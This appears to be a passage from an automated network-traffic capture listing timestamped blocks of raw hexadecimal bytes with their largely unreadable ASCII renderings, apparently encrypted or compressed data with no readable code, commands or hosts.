                                                                              2023-10-26 07:45:59 UTC4671INData Raw: 3e 42 ef 79 c6 75 4a 38 ee ab 0c f0 74 f3 6c 46 16 22 cb 38 14 64 e8 4d 45 d9 c4 a0 2f b2 aa 63 b2 e9 f2 a2 22 b9 0b a8 d4 99 a1 17 c2 af b9 95 34 c2 a9 5b 5a 62 93 0a 6d 49 c8 1f 55 7a 06 19 4a 1c 3b 45 fd 61 55 e6 54 03 b2 ea dc 1d b4 e8 48 25 c2 70 b8 86 9e 35 c6 41 0d de e6 9d ea 44 7e 73 ba e5 0c b8 ee ee 46 62 ea ba d4 c8 4b 35 90 d6 4a 0f 6a 11 e7 57 45 62 01 8a b5 42 6b 26 43 9c 0f f8 54 af 5d 2d 0d 46 0f a5 12 22 ec 3b f0 7c 49 d8 4c a0 a2 7b 07 3c 85 f4 48 e5 16 2b 8c 7d bb ac f4 e8 c5 86 ce 84 41 db 53 63 96 4a 96 c1 2d dc 92 b2 25 e2 f9 9b 06 3d a6 15 2b 57 c6 01 ec 38 a5 02 bb 1c 80 89 db 20 92 6d 7d fa 31 1b 6b b8 4c 8d c9 9c 17 97 65 db 54 3d 6f d8 aa ea f8 22 4a 63 48 e7 e2 69 52 f5 d1 79 0a bb 0b 3a 11 ed f4 21 a3 6a f9 b0 3e 71 6d cd 44
                                                                              Data Ascii: >ByuJ8tlF"8dME/c"4[ZbmIUzJ;EaUTH%p5AD~sFbK5JjWEbBk&CT]-F";|IL{<H+}AScJ-%=+W8 m}1kLeT=o"JcHiRy:!j>qmD
                                                                              2023-10-26 07:45:59 UTC4687INData Raw: c1 6a d4 a7 d4 fd f2 00 f0 bb 72 39 44 c8 75 95 6f 90 56 78 c5 e5 b3 f7 b2 01 ac c8 da bf 2a ba 04 b2 e9 5a 47 09 15 30 14 87 0d 88 14 e6 ed 79 60 dc 5b 0b 9a ed 3d 59 54 fe 59 3c c4 66 62 7d af f5 f8 97 8a 60 6a 3c 72 35 bb 36 4d 03 c3 50 59 64 19 29 b3 dd 36 f4 d3 61 c4 d3 d4 21 8e 04 58 e2 60 f8 4a d9 e7 28 c8 4a 3d 0a 66 84 6a 9c 0d 1f cd 4e e9 01 74 20 ed 87 41 de fd 35 cc e6 c4 94 d6 b2 d5 de 9e b7 fc c0 75 76 65 8f 57 e6 02 62 c5 80 e4 69 75 38 63 1a a0 1f 8b e2 6e 06 c9 72 46 54 cd e1 9f 78 94 52 6e dd 61 62 fc 9a e7 8d 9d 6f 34 80 f4 07 db ec f7 e5 13 82 82 18 f4 8c 29 86 5e 22 ee fc 58 d2 d7 f7 12 22 8a 59 0c 2d dd 4f 34 6b 73 a8 61 6d 6a 4f d4 41 16 15 71 03 32 83 00 c2 69 71 ee ea 6b 03 e4 01 fd 2d 74 89 28 35 ec 21 f2 f5 f6 e2 f1 f7 32 c2 bd
                                                                              Data Ascii: jr9DuoVx*ZG0y`[=YTY<fb}`j<r56MPYd)6a!X`J(J=fjNt A5uveWbiu8cnrFTxRnabo4)^"X"Y-O4ksamjOAq2iqk-t(5!2
                                                                              2023-10-26 07:45:59 UTC4703INData Raw: 40 82 e4 32 ab a9 ea 51 79 25 e0 2d 74 26 d6 79 5a 82 4d ae d4 61 74 fc ef 2f 61 0f 8c b5 b4 ee 47 e2 b3 e2 e2 81 3d 98 b0 a1 ea b7 0b c1 68 db da d1 0a 7a b6 cd c5 0f d3 57 45 38 54 7c a2 62 78 fe 30 d4 14 b8 d8 5e fc cd 18 f8 19 84 58 b8 aa 41 03 80 7b 07 9a 30 f4 ed ff af f4 2b 71 78 74 fe 14 a3 f9 e0 71 98 bc c1 01 9b fb 0d 6b 12 b2 c9 aa e2 07 60 38 03 6b 96 b5 57 ed 80 c0 61 56 57 a5 ac b4 63 6a 23 40 62 a7 67 34 e6 5a 38 5a 34 5d 78 d4 b6 8e 6a 4e c3 ce 12 ef a8 d0 df 73 ce 52 38 db e1 3b 7d f4 82 2a e4 04 49 31 47 9f 97 0a 97 74 62 ce a7 a2 00 c9 57 a3 01 da 32 e2 44 55 d7 50 e2 3d 2c 69 69 eb 89 3d ef bb 37 fe 49 65 1b f5 67 98 90 71 50 e0 ad 40 a2 e1 ef 04 2b b2 75 f4 69 5a 2c c4 6a ad dd 48 c2 0b 98 f4 a3 fe 70 42 0a 40 dc c7 9b ca 0c 15 42 0b
                                                                              Data Ascii: @2Qy%-t&yZMat/aG=hzWE8T|bx0^XA{0+qxtqk`8kWaVWcj#@bg4Z8Z4]xjNsR8;}*I1GtbW2DUP=,ii=7IegqP@+uiZ,jHpB@B
                                                                              2023-10-26 07:45:59 UTC4719INData Raw: d4 35 54 5d 04 c3 c3 ba 94 1a 44 5d da e0 26 38 74 43 fc 28 64 f3 ba 70 93 3a 08 11 de 61 5d b5 34 d9 14 96 33 e2 15 5e 19 3c 0b b8 d8 4c be fb f4 7e 43 fd fd 4e 81 aa ff 6a 51 d2 50 ea f4 ca 74 eb ba d5 00 45 f4 8c b8 b3 91 57 bd 6c eb 77 11 a4 75 75 d7 fb 4a 5e e9 03 cb 49 9d 35 0b 1a 09 76 29 e0 89 81 3e b8 11 d6 8a 5f 25 f1 4a f8 0d 9b 5a 99 7a 67 74 e9 41 d7 97 f7 6a 8b 63 df aa 81 2a 98 8f e0 c1 77 03 ba 61 65 a8 eb d8 12 05 8c 43 f1 6a 1d 8f ae 94 27 de df 14 e2 bd 43 1c 3f d5 7e 01 40 ce f3 19 b2 ce 62 4e 74 f1 04 06 50 ed a6 10 e2 64 db 34 86 98 42 f4 0c 12 a5 8a 7f 42 21 6b 55 50 74 d6 2a 2b 38 de ce bc 59 0e 3f 01 f8 f4 07 12 9b 8c 82 88 74 63 35 94 67 fa 7c ee 49 83 90 c5 dd 74 a2 7c 53 49 67 0c 0a 04 3c 6e e3 40 42 8f 8e 51 f3 0e 34 d4 65 a9
                                                                              Data Ascii: 5T]D]&8tC(dp:a]43^<L~CNjQPtEWlwuuJ^I5v)>_%JZzgtAjc*waeCj'C?~@bNtPd4BB!kUPt*+8Y?tc5g|It|SIg<n@BQ4e
                                                                              2023-10-26 07:45:59 UTC4735INData Raw: fe 47 ba b3 f2 da 80 0d 03 5c 91 18 54 4a 3a 8e e8 b7 b0 e6 ee 81 79 ff 20 63 2b 6c 78 7b 6f d2 7d 4a c9 1b f4 23 0c f5 15 d7 7e e0 75 62 ca 1f 90 c0 24 5c 5d 74 4e e4 f4 f1 62 14 c7 fa bc bc 00 6b 6f 57 7b 0d ea 25 c9 15 0c 52 54 62 7e 8a 96 d4 cf 37 14 e0 0a fd 8f f2 ea 08 dc d0 8c 26 35 78 74 8b 08 da 7f 38 74 c1 78 25 23 91 d7 fd c2 00 ea 37 8a 72 9f d5 ca 21 2b 89 08 35 0f d1 45 42 f5 8e 0c 0d 7e 4a 54 63 de 56 4b 06 69 9b a3 bc 7e b8 ef 63 b6 78 1b 33 95 6d 24 22 d2 89 7a 62 61 a4 a0 3f 0e 94 1a 62 43 dc 81 f1 c0 a8 0a cf 89 d8 9a 83 0a 3c f2 e1 e6 67 4a 01 66 28 b4 b8 39 71 c0 76 56 e9 91 22 47 59 3c 88 49 e6 f4 f9 6b 10 49 91 bc 53 5b 6d d7 25 73 de 9d 88 74 4f d4 99 34 60 47 f4 3b 3e 5b 45 3c c2 ef 4b 4f d1 e7 61 1c 0b 5c 78 73 ff 57 d6 48 af 7d
                                                                              Data Ascii: G\TJ:y c+lx{o}J#~ub$\]tNbkoW{%RTb~7&5xt8tx%#7r!+5EB~JTcVKi~cx3m$"zba?bC<gJf(9qvV"GY<IkIS[m%stO4`G;>[E<KOa\xsWH}
                                                                              2023-10-26 07:45:59 UTC4751INData Raw: bf c5 0a 55 5a 22 b3 77 ac 80 e9 23 4d 79 bc 5b 42 e5 0a 18 46 b1 52 09 d4 3c f9 c9 3c c2 83 69 e2 4e 05 ad f0 32 44 2b 6d e1 08 13 d4 a9 ca df 12 88 47 6e 34 86 65 71 d8 72 6c 46 4f d2 b2 91 8a 92 0a e4 b8 84 4a 35 d4 80 a5 22 65 ec ca 97 f2 d2 d1 7c 04 23 ab 6c fc 0d 72 9c fc 3a 6e 23 23 3a bf 33 74 41 a4 40 8c e2 af 96 72 e2 c7 78 f9 93 c4 28 d4 22 ad c1 ed 66 3a 3f ff 3b b9 0c d4 61 d6 62 17 78 78 ce d4 91 d7 04 b1 b7 b6 77 a4 75 4e 1a 93 22 fb 10 5a a2 6b f8 14 0b 9d 37 f2 79 78 08 d8 e2 60 d6 89 eb 1f 8a 34 88 d2 e2 a1 a1 54 38 34 82 cf 65 d1 fa 5a b8 14 87 b7 5c 0a b9 22 d8 65 84 2a ea fe 33 eb e9 f4 47 bd 60 d1 0a eb e7 13 3c 8a a9 1c 94 a4 3c 47 c2 15 4f 25 0d 2b 39 d4 9b 04 c1 74 bc 09 f8 4b 74 14 b8 14 77 a5 3a 44 79 e1 1b 7d f1 0c 67 14 49 10
                                                                              Data Ascii: UZ"w#My[BFR<<iN2D+mGn4eqrlFOJ5"e|#lr:n##:3tA@rx("f:?;abxxwuN"Zk7yx`4T84eZ\"e*3G`<<GO%+9tKtw:Dy}gI
                                                                              2023-10-26 07:45:59 UTC4767INData Raw: 1d a1 bd d2 a5 01 36 34 33 23 0b 78 91 55 cf a9 59 40 5f f8 8a fa ca f7 c7 71 90 6d 44 58 0f 4c a1 63 e0 d9 17 45 53 b8 93 72 85 39 d4 c9 0a 38 79 de ca 7d 3e b1 4e f8 f3 c8 0f fe 87 90 3f ef 16 a7 0a 98 c7 76 2a e3 30 62 ee ba 45 05 83 18 b8 bc ea 13 fe 50 f0 2d 08 4c dc 0b ee b4 92 98 54 78 6c 66 f0 3d f0 ff bf d7 6a 57 b1 04 67 7a d5 8c 40 e4 64 67 9a 41 b6 3d 84 38 54 43 38 d3 7b f8 61 18 f4 96 b8 2e 0c 45 bb 7c a1 7b 4e f9 cc 5f 4a da b0 29 4a 7a bb db bf 5c 45 aa 1b a8 34 b1 db d6 de c1 53 59 94 86 02 cc 15 8f 09 69 82 c2 0b 26 6e f3 ea a0 0f ca c1 c7 09 c7 7d 78 7c bc ce e1 43 8a c9 26 f4 26 16 24 9b ed ca 20 8c e1 9a 8e 73 e2 fa c7 82 dd 44 1c f4 07 55 53 cd bc 1e 6b d8 87 8f 0b 27 65 8a a3 07 bc 50 cf 54 20 92 03 f2 ba bf eb 46 82 b7 ce 70 a2 d4
                                                                              Data Ascii: 643#xUY@_qmDXLcESr98y}>N?v*0bEP-LTxlf=jWgz@dgA=8TC8{a.E|{N_J)Jz\E4SYi&n}x|C&&$ sDUSk'ePT Fp
                                                                              2023-10-26 07:45:59 UTC4783INData Raw: 94 d9 bc f7 7a 83 ad e8 f9 a4 90 cd 16 22 49 9c b0 fe ef 4e 79 02 3c 30 74 45 7d ed b2 41 69 18 41 4a ef 01 dd 0f e9 57 5b ac 76 72 74 58 88 a4 f4 88 7b a0 14 6c 91 f3 c4 80 4e 77 46 aa a9 6e c3 7d aa 97 41 99 d7 d0 0d bc 80 09 94 91 38 5e 34 a2 ca d2 72 c1 c9 97 92 a2 33 03 d8 83 e8 3c 52 37 a0 0a 11 97 6c f8 83 e2 b2 ea b4 85 35 d8 50 3e f3 d1 1c 82 9a 9a 94 07 69 39 b4 05 c4 a8 54 81 49 38 14 e2 8a 65 10 9d 36 58 17 f4 9c 37 0d 17 eb 97 ad 1c 42 4e db de aa 26 30 02 eb d3 ff 39 7e 68 9b ec ca 8b 09 9d 35 f8 20 a2 c2 dd 74 01 1b 78 7f 18 6b 0b 5d 9c 4a 38 7b a2 eb d7 8e b4 41 ff 3d c5 aa 4f 33 07 4b 1d 91 a2 80 d6 40 42 c4 54 43 d2 26 f8 78 9d 88 b8 83 72 a5 1b b4 ba 78 02 ba bd 40 3e 94 a9 88 f9 6c a2 ea 55 b1 0a 12 3a 89 02 94 79 da 44 ff 2c b9 e0 f8
                                                                              Data Ascii: z"INy<0tE}AiAJW[vrtX{lNwFn}A8^4r3<R7l5P>i9TI8e6X7BN&09~h5 txk]J8{A=O3K@BTC&xrx@>lU:yD,
                                                                              2023-10-26 07:45:59 UTC4799INData Raw: 9a 1d aa 2e b2 58 84 4d 4b 42 5f 68 54 7b bd e7 4d a8 c7 be d0 6d b7 97 02 cb 3c e0 0a c8 03 78 64 b4 c4 a4 a1 e9 61 5e 6f 0f 4b 3d fe fb 69 58 49 f7 6d f8 e8 a6 12 d3 1d 02 30 af 55 42 b2 cc b3 a1 0e 17 82 62 09 4e 7c ea d2 39 b1 09 ab 21 6b 8b bc 94 fb c8 3d 70 cb 1b cb 1f c3 5f 7e 10 42 51 9f 17 f4 9f a3 56 4d 55 c2 e4 ac 01 eb fd 00 9d 64 4c 9d 8a c4 61 4f 01 70 f1 b2 f0 c3 3e 14 67 1e 2d 9d 00 8f d8 74 89 e7 84 94 42 f7 11 7b f8 ed 68 78 f9 06 9e b0 01 5f 13 34 14 49 0d be 5a 45 21 c3 a1 3a 12 54 c2 6d 7c bd bf 44 2a cf f9 6a 2e f4 96 af 51 41 d2 bd 96 78 d7 9e f7 8b 20 43 38 f2 5a c7 f7 81 a6 4a b8 0b 3c 0e d8 18 e3 ea 23 6c e7 ce 57 bb a9 81 38 c1 7c 73 a9 6f e2 5a a5 bd 14 2b 19 64 a9 92 f6 52 69 dc 12 4b f8 6a 18 3d 09 b2 33 45 82 ea 32 d3 f1 8c
                                                                              Data Ascii: .XMKB_hT{Mm<xda^oK=iXIm0UBbN|9!k=p_~BQVMUdLaOp>g-tB{hx_4IZE!:Tm|D*j.QAx C8ZJ<#lW8|soZ+dRiKj=3E2
                                                                              2023-10-26 07:45:59 UTC4815INData Raw: da be c9 37 89 07 11 47 54 42 c1 6a 67 41 14 78 55 7d 2a ed 15 f9 74 2e e2 49 5f 45 bb c1 c5 77 f4 73 b8 5b 42 8f 90 1b b4 c1 ba 7b f4 bd 1e 33 6a b7 ff e7 67 66 c9 ac 6d a7 11 fb b4 b7 6f 9a 9c 2b 99 5f 18 40 0d c7 08 ed 8f 26 14 e3 2c 21 58 b9 ca 95 81 9a b8 4b f4 e0 cd 66 56 ff d5 a4 ba ac 92 d8 14 0b 7b e2 fb 0c 89 54 42 70 bf 9b 89 09 40 ea 14 42 fe be c6 e5 ea 92 7c b2 f5 23 06 3a 0e 08 b4 7a 41 57 3c 60 ee 28 68 ee b6 e3 94 54 3a 14 90 22 b3 06 bf 0a 0b c4 b4 6b a4 e9 b4 ba b0 8b 45 ec 2a fa 6d 20 d3 87 68 2e 3f fb 30 e2 38 df 8a 69 ca 40 73 03 1a ff 5d 9a 0a df 78 6b 06 91 09 b1 a2 17 e6 a8 61 2d 30 eb 5b d5 45 7d ca 87 33 15 29 61 51 d2 c5 a1 d4 8e af 02 c2 a1 46 3f ba 0f 3f d8 b8 f1 ae 8a 11 b0 e9 3b 20 27 4a 92 64 a2 bd 93 94 e1 a1 17 f3 76 9b
                                                                              Data Ascii: 7GTBjgAxU}*t.I_Ews[B{3jgfmo+_@&,!XKfV{TBp@B|#:zAW<`(hT:"kE*m h.?08i@s]xka-0[E}3)aQF??; 'Jdv
                                                                              2023-10-26 07:45:59 UTC4831INData Raw: b4 7a 8b 57 97 18 6b 5e f4 65 24 f1 6e 3c 48 98 fc 60 9a 79 f0 77 a5 88 e6 d8 b2 78 ad 4b df 45 e4 8f 90 50 34 06 16 af 6b 02 6b 7f a7 4b a1 78 6f 51 00 3c 58 dc a1 2f d4 6d ef 23 3d f0 ac 2f 34 c8 4b 5a 6f c2 f4 5e cf 4d 87 f8 41 f8 9e 01 d9 54 12 9b 60 63 aa eb 03 51 8a 53 89 a4 8a 7b cb c7 4a 98 3f ed b1 1f d4 63 bc 92 f0 ed 57 18 b4 e9 d1 d7 1e 34 63 85 b8 51 d3 37 74 b4 c4 a8 f9 ea b0 00 72 62 79 a6 d4 a4 8d 2b 75 23 16 0f 66 8c 76 b8 9a 32 d3 7c da b1 b9 04 19 8b 0a 7e 3e a3 ad 34 d5 49 4b a4 0e f7 e2 37 ea 7d 6c f9 74 73 38 b9 34 e9 a9 97 f3 9d fa 17 65 c0 0c 7a 79 46 c3 02 1b d8 a5 f7 14 03 50 75 9f 66 e2 1c cb 35 8b b0 94 35 f0 f2 bf 50 4d 30 54 a2 0e a0 c5 88 3b 9c 23 a2 68 c2 be cc ce a3 74 e4 99 67 58 f3 d2 f7 e1 bc 68 47 95 62 ae b2 5e 10 73
                                                                              Data Ascii: zWk^e$n<H`ywxKEP4kkKxoQ<X/m#=/4KZo^MAT`cQS{J?cW4cQ7trby+u#fv2|~>4IK7}lts84ezyFPuf55PM0T;#htgXhGb^s
                                                                              2023-10-26 07:45:59 UTC4847INData Raw: 5c 82 68 58 42 dc c1 88 c0 0c 5c f8 b1 b1 a7 69 57 59 7b 5a 45 36 6b 09 10 02 74 38 e2 85 29 f8 d4 bc ea 60 3f 82 fa 49 b3 2d e5 23 0e 59 79 59 da f3 ca 77 a3 e2 f5 21 03 2d fd 0c 4e a2 4e 09 85 98 ea 37 6d 5a 64 f1 7d 13 4b 71 6b c7 44 f8 6f 3e 9c c3 ed 81 b1 db 44 6e 6b 12 be 57 01 a0 7d d6 0a a7 14 e2 13 5e fe 45 0f 59 00 f5 31 21 d4 89 46 0d b8 e1 08 3a c2 82 5a 15 74 8e ef 8a d4 7e 40 71 7a 87 45 dc ef c1 69 ba 14 f1 aa 17 7e de 0b e4 b8 a0 88 f8 ef bf 2e 38 65 9f 5a d8 0a 8f ca e9 b4 c0 05 94 c3 58 14 a7 92 0f ab f7 6d 7a c6 50 6c 54 0a 90 e0 0c 29 b8 be 40 a9 b7 c7 b7 aa 77 ed 7b 55 02 0d bd 4e 0b a4 83 8a 64 e6 9d 8f 38 f4 75 9f ea 17 41 6e 00 f4 a6 c3 66 dc 01 f2 7c fd b2 0c a3 91 58 6a 78 eb 44 79 58 e2 80 f1 27 1c 9f 82 78 74 dd af 55 7d 71 73
                                                                              Data Ascii: \hXB\iWY{ZE6kt8)`?I-#YyYw!-NN7mZd}KqkDo>DnkW}^EY1!F:Zt~@qzEi~.8eZXmzPlT)@w{UNd8uAnf|XjxDyX'xtU}qs
                                                                              2023-10-26 07:45:59 UTC4863INData Raw: ef b6 55 31 4c 12 ab 83 ac 33 eb fd d4 64 cf 5f 70 79 9e 32 cd fc ea 97 d6 8b 39 84 ba 7e c1 73 f2 d9 fd a2 6e d9 43 73 d4 63 aa 79 d0 b6 99 b7 f0 3c 26 a1 59 c3 2a be cc 59 46 fa a5 bc 4a 62 f4 db d8 f2 6c eb 4f a0 df d6 5f 05 74 67 b8 2d 5c 8b 8a b8 14 b4 41 7a 3d c7 73 5b 91 dd b2 17 b1 22 6e 7d 03 bd 0f a2 d3 41 6a 40 15 3a 2b 7a fa c5 c8 79 a1 98 d2 77 23 b9 67 da 49 18 0b 1a 2d 45 ec af 19 02 8b 54 48 75 bf 53 77 b3 ea 04 44 6a ca 1d f8 5f ce f7 9d e6 72 00 5e df 73 7c d9 3b 61 d0 54 63 43 5c b2 46 69 0c 34 ad 39 08 c3 61 f6 0f 16 35 f6 33 d3 5e 9f 12 b0 c1 7a 21 f4 db 24 a8 75 ed ea 89 d7 8f 39 58 a0 eb f3 8e 01 d5 6c 78 e1 a5 f6 21 4c 5d a4 48 85 83 6a ce 7c 62 fc ab 80 62 e3 ff a7 eb dc 05 2c 3f 5c cb 94 6a 8f 28 d2 d0 48 5c bf c8 99 09 b9 65 ed
                                                                              Data Ascii: U1L3d_py29~snCscy<&Y*YFJblO_tg-\Az=s["n}Aj@:+zyw#gI-ETHuSwDj_r^s|;aTcC\Fi49a53^z!$u9Xlx!L]Hj|bb,?\j(H\e
                                                                              2023-10-26 07:45:59 UTC4879INData Raw: d3 e3 9d af 54 19 68 07 20 e2 91 b8 b2 29 43 9c d4 a3 7f 88 88 db ed 68 40 45 9f d3 54 e3 49 86 b8 a2 ba b7 1c 88 98 40 54 6b 81 65 9f b2 ea 7b b2 74 23 9d 54 a4 7b e3 d4 41 1f 0d dd e6 47 9d 7b 62 e9 b7 88 de 53 93 66 3a 09 ad 90 f6 aa fb 04 50 7c 9a 34 64 4f 0d db 65 49 25 4c 02 e9 70 09 36 69 8b 15 67 8c b9 34 e3 63 fa 34 34 89 a1 3d 98 aa 37 62 99 3a d4 67 c3 4a e4 74 e2 91 04 f1 de 6c fd e2 84 41 96 3b 42 5d 88 dd 50 b2 17 10 a1 a9 77 84 7a 0a 72 ff 51 7b f8 e4 02 2b 02 19 21 6f fe c3 45 87 d8 bb 98 08 38 c8 ec 9e 37 61 91 d8 77 49 b4 6a 5f c8 a1 aa 56 02 8e 8f ef a6 41 bf ec c3 21 db 57 70 45 02 6e 34 49 0e 38 b4 61 6e 52 43 aa 58 b8 ac f3 a2 57 73 3b fc 2f 03 4a 78 fa 6c 62 5a 51 a5 f8 53 77 74 76 08 0d 6c 81 f1 25 94 62 60 93 5a 06 6d 5f f3 3e c5
                                                                              Data Ascii: Th )Ch@ETI@Tke{t#T{AG{bSf:P|4dOeI%Lp6ig4c44=7b:gJtlA;B]PwzrQ{+!oE87awIj_VA!WpEn4I8anRCXWs;/JxlbZQSwtvl%b`Zm_>
                                                                              2023-10-26 07:45:59 UTC4895INData Raw: 6e 6a a0 51 43 0a d9 de 89 33 6b 13 60 62 8f 35 d4 01 2b ce a7 51 8a ef 6d 62 6f 00 83 89 a9 0c c9 4f b0 14 99 d4 0a ee 45 cb 2a 71 09 0c a7 37 3c 51 e1 10 27 cd 4a f2 06 40 2b 44 b4 7b 0c e5 b8 01 0e b4 a2 c0 08 78 5e bf fa fa 0f ad 40 d0 6b 8a 84 dd 57 ee f4 db 74 30 80 78 ad 0c fd 93 7a d3 3a d5 6c 93 2f ac 6c b7 29 f8 ad bd 6a 88 f0 79 af d4 34 84 6e 55 2c 4d 1c 5c f4 93 b2 50 fc 25 64 7f 83 ee 46 6c 75 50 48 58 ba ff 62 58 98 ae 02 e8 0c 97 b0 08 34 63 05 8a fb a2 aa f5 c4 f5 58 8b db 35 9b ab 54 49 c5 33 15 88 d4 83 54 87 53 d9 27 22 eb f8 91 9b 6a 78 f0 c2 32 85 c6 60 1b ef fc 01 0f 70 61 26 16 ae 94 66 49 d5 c3 55 2a 8e 00 c8 e9 77 8b bd 4c e4 a4 e1 b0 dd c5 7e 2d 10 71 82 64 d1 b4 8d 2f f6 13 a2 35 87 3d fc ea 8a 61 85 39 f7 c7 44 a1 1c 64 42 f5
                                                                              Data Ascii: njQC3k`b5+QmboOE*q7<Q'J@+D{x^@kWt0xz:l/l)jy4nU,M\P%dFluPHXbX4cX5TI3TS'"jx2`pa&fIU*wL~-qd/5=a9DdB
                                                                              2023-10-26 07:45:59 UTC4911INData Raw: f2 dc ab 6e 65 39 e0 97 8b 55 e6 56 50 a2 e8 ff ca ad cd 0c f3 c5 d2 00 08 47 66 23 92 a2 0a 37 f9 f7 f8 99 a8 b7 aa 37 fb c8 62 dd 9c 22 65 d7 f4 7c 97 f5 f7 38 16 a5 7d f7 51 38 dd 7f 56 d8 14 5e 5b a0 14 df c0 77 ba 55 6e b8 f1 21 fc 67 15 22 03 ed 39 97 52 f8 da f5 ca 70 7a 97 2a 78 64 c0 5a 38 f4 42 00 a1 0f 47 03 c0 6b 65 c6 8b 61 eb 62 b9 de a2 25 9f 3e a2 07 6e e7 f6 49 89 54 66 8f 01 63 5a 48 98 70 39 35 50 59 a9 32 bc f0 14 10 89 7d 91 11 53 74 c6 03 1a e4 57 f2 ec 6b 3e d8 5b d4 6c fa 18 d3 01 b7 fc 73 90 41 1c 96 ab ea c0 79 a2 a3 58 14 ac 19 2f d9 94 ea 78 6f b6 22 17 cd cc 96 18 2f 86 c8 cf 34 22 3e 6e 5e d9 b1 89 6f a4 6b e7 84 42 0a 5a 01 ec 7b 19 b4 75 54 89 64 7d 40 58 54 eb c1 71 a9 df 96 38 f9 ee 92 f7 7b 51 3d 98 2b b1 fa 57 78 e6 0d
                                                                              Data Ascii: ne9UVPGf#77b"e|8}Q8V^[wUn!g"9Rpz*xdZ8BGkeab%>nITfcZHp95PY2}StWk>[lsAyX/xo"/4">n^okBZ{uTd}@XTq8{Q=+Wx
                                                                              2023-10-26 07:45:59 UTC4927INData Raw: 70 42 59 8a 93 62 fa f7 0e 8e ba 5c f4 66 fb 4a 93 82 0a 5c cb 7e 0d 1c 70 17 6b c2 5b 02 09 99 a5 fc 9c 17 2d 82 82 5c 25 87 e9 37 05 3e 9e 27 f2 a8 ea e3 06 9f 58 52 c9 31 7a e0 94 89 5a 41 8c a2 f7 9c a4 8b 2a 97 a8 f5 aa 26 18 02 06 98 44 b2 8c 20 07 6b 89 5c b3 09 c3 b7 f9 0f 04 a2 9b 46 cb 05 54 e2 c9 da 16 0d 62 41 09 84 b7 f7 13 ac 82 51 4f 72 d1 db 14 8e 14 1b 0d 5f 5d b3 a7 e9 6a b8 84 79 56 d0 e1 72 3e 56 22 c2 91 39 f4 75 ba 46 c2 9b 5a 7a b4 72 b2 00 bb a1 85 53 0e a2 a9 d2 f4 f9 c7 c5 9b 00 4b 91 e8 41 5a 18 74 cb 77 6d d8 f1 03 55 9d f2 f4 f7 44 91 89 09 94 b2 aa d7 8e d8 ac 35 fd 61 4a 62 5a 82 c2 6b c5 cd de 65 9d 02 0b f8 0e c2 15 2d 71 72 fa 2f ee 4d 8f 5b f2 32 92 64 55 75 cc 43 b4 68 94 61 4c c7 c9 db b4 cc c0 00 05 a5 76 c4 14 82 92
                                                                              Data Ascii: pBYb\fJ\~pk[-\%7>'XR1zZA*&D k\FTbAQOr_]jyVr>V"9uFZzrSKAZtwmUD5aJbZke-qr/M[2dUuChaLv
                                                                              2023-10-26 07:45:59 UTC4943INData Raw: cc dd 96 78 0e b3 83 53 40 7c d4 80 e2 fc 36 26 f4 81 1a df 7a 2c 2d 78 75 ef f8 a3 c7 c3 32 13 62 22 e6 62 9a ee b4 6a 58 f8 3a 78 00 46 97 7c 04 63 89 c5 c5 61 52 a3 6e b7 b8 77 89 f4 71 2e b8 ff 24 1b f4 97 86 20 fe c5 77 62 40 34 50 7d 82 ef bd 06 7c 00 ea d7 04 f2 68 14 13 7f 6a 38 6b cd 07 2d 7e 24 eb 73 e2 65 de 5d f1 f4 3c 30 ce 61 f4 02 6c 0b c9 14 43 0c bc f5 94 82 8c b1 64 13 41 78 aa 84 a5 e3 09 de 64 eb ec e9 56 d0 33 b5 87 79 17 3e 12 c5 f1 f3 f6 f7 7e 7b cb e5 44 e2 1a 30 d6 c1 f1 20 53 3a 41 d8 10 4e 0d 78 e5 43 6b 59 97 d3 d0 5c b1 d9 07 78 0a c7 2a d9 2f 15 53 6f e7 39 14 13 f4 d2 57 52 79 02 f8 77 d0 fc 05 a8 08 c2 78 0e e2 bb 47 db 74 02 b9 d8 34 62 55 a6 4b 33 41 5a c8 87 e7 f8 75 24 49 a4 5a 88 de 9e 6a 64 14 e9 79 cb 3e 98 16 82 ea
                                                                              Data Ascii: xS@|6&z,-xu2b"bjX:xF|caRnwq.$ wb@4P}|hj8k-~$se]<0alCdAxdV3y>~{D0 S:ANxCkY\x*/So9WRywxGt4bUK3AZu$IZjdy>
                                                                              2023-10-26 07:45:59 UTC4959INData Raw: 58 b2 14 08 aa 85 41 18 11 65 72 5b c9 c3 7f 42 e3 19 dc 90 ef 2a ee 92 84 62 dc 56 b5 ad 52 d8 11 9c 85 4c d4 57 05 e3 dd a1 53 71 54 1f 9e c8 14 7e f1 6f b1 77 bd fb f4 85 50 95 d4 63 0b 6c 81 2b f2 2c b8 21 0a 7e ca e9 3b 37 b0 23 aa e2 72 c5 f5 77 6c 1c 30 95 d9 37 0b 88 dd b5 2e 7b b7 83 2f 59 be d2 5b ae f4 db 46 c3 f7 d8 9b ff 34 61 bf fd e3 85 a9 2d 12 30 0e 14 6b 4a 8b 50 51 ad 03 92 73 a2 b3 34 46 98 8a 7a 3c a5 4c 1e 2a 42 0b a4 cf 66 02 d1 c0 b3 d6 b7 94 d0 6a 22 b3 b1 a2 57 d0 88 b9 43 a2 61 0a 9c d4 54 08 a8 c6 12 4b 0d c5 65 84 f0 14 ef b4 3b 70 02 81 c3 d4 e5 63 c3 04 91 45 8c fb cb 07 a7 69 e2 aa 0f 03 34 8a 0d 1e 62 dc 98 84 42 7b 20 6b 42 5a f1 ee 33 a6 a5 b4 51 b0 55 de c1 0d c4 f4 65 b3 56 84 0d 47 f8 74 fd 61 a4 b6 d4 5d 25 03 22 11
                                                                              Data Ascii: XAer[B*bVRLWSqT~owPcl+,!~;7#rwl07.{/Y[F4a-0kJPQs4Fz<L*Bfj"WCaTKe;pcEi4bB{ kBZ3QUeVGta]%"
                                                                              2023-10-26 07:45:59 UTC4975INData Raw: 81 7b be 73 58 22 f2 a9 f2 c2 bb a1 f4 ab a9 9b 54 56 a6 45 35 b0 93 ca f4 ae 44 58 60 03 8b 65 89 e6 19 f0 76 ed ee 7f f7 62 96 f5 90 e4 21 4b c4 01 b3 24 80 63 79 51 51 79 ca 00 48 93 8a 68 2e cd 47 f8 f4 8e a7 5f 55 b9 97 00 b6 c6 ea b7 08 ae fa c8 e6 de b8 d7 fb f7 03 24 be 3b 8b 58 63 0f 64 ca f4 9f 10 91 54 55 03 60 f0 e4 99 0f 50 42 7d 52 fe 91 4a 2e cb 66 3e f3 e2 ae 13 94 14 6a 26 19 62 52 81 73 e5 a9 d9 47 f4 36 db 5d 09 f7 0d b3 f0 34 8b 70 e6 b8 c9 cf 67 ce ff e7 54 1b 73 07 6b 82 a6 44 17 dc 45 11 54 58 58 f8 97 4d 13 78 84 df 3d 64 b4 a3 ae 6f 49 8d d4 3e 42 d1 0f f1 be 81 13 99 74 c4 f9 77 3c 